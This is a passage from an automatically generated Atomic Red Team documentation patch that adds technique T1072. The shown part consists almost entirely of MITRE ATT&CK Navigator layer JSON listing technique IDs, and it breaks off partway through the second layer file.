 c99a829f-0bb8-4187-b2c6-d47d1df74cab
+b4988cad-6ed2-434d-ace5-ea2670782129
From 8825813c53c0b22a726cad8558163ddfae9c8a7e Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Wed, 23 Jun 2021 16:31:41 +0000
Subject: [PATCH 62/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]
---
 .../art-navigator-layer-windows.json | 2 +-
 .../art-navigator-layer.json | 2 +-
 atomics/Indexes/Indexes-CSV/index.csv | 2 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 2 +
 atomics/Indexes/Indexes-Markdown/index.md | 6 +-
 .../Indexes/Indexes-Markdown/windows-index.md | 6 +-
 atomics/Indexes/Matrices/matrix.md | 4 +-
 atomics/Indexes/Matrices/windows-matrix.md | 4 +-
 atomics/Indexes/index.yaml | 72 ++++++++++++++++++-
 atomics/T1072/T1072.md | 57 +++++++++++++++
 10 files changed, 145 insertions(+), 12 deletions(-)
 create mode 100644 atomics/T1072/T1072.md
diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
index 94952e5e..1b23e51b 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true
},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T10
78","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004
","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497",
"score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":1
00,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID"
:"T1574.012","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (Windows)","description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabl
ed":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1072","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":
"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137
.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T14
91","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.003","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.001","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.002","score":100,"enabled":true},{"techniqueID":"T1546.003","score":100,"enabled":true},{"techniqueID":"T1546.007","score":100,"enabled":true},{"techniqueID":"T1546.008","score":100,"enabled":true},{"techniqueID":"T1546.010","score":100,"enabled":true},{"techniqueID":"T1546.011","score":100,"enabled":true},{"techniqueID":"T1546.012","score":100,"enabled":true},{"techniqueID":"T1546.013","score":100,"enabled":true},{"techniqueID":"T1547.001","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.004","score":100,"enabled":true},{"techniqueID":"T1547.005","score":100,"enabled":true},{"techniqueID":"T1547.009","score":100,"enabled":true},{"techniqueID":"T1547.010","score":100,"enabled":true},{"techniqueID":"T1548.002","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1550.002","score":100,"enabled":true},{"techniqueID":"T1550","score":100,"enabled":true},{"techniqueID":"T1550.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.002","score":100,"enabled":true},{"techniqueID":"T1552.004","score":1
00,"enabled":true},{"techniqueID":"T1552.006","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.005","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1556.002","score":100,"enabled":true},{"techniqueID":"T1556","score":100,"enabled":true},{"techniqueID":"T1558.001","score":100,"enabled":true},{"techniqueID":"T1558","score":100,"enabled":true},{"techniqueID":"T1558.003","score":100,"enabled":true},{"techniqueID":"T1559.002","score":100,"enabled":true},{"techniqueID":"T1559","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.002","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1563.002","score":100,"enabled":true},{"techniqueID":"T1563","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.003","score":100,"enabled":true},{"techniqueID":"T1564.004","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID"
:"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index 9444f3fc..e607a440 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"tech
niqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004",
"score":100,"enabled":true},{"techniqueID":"T1059.005","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"t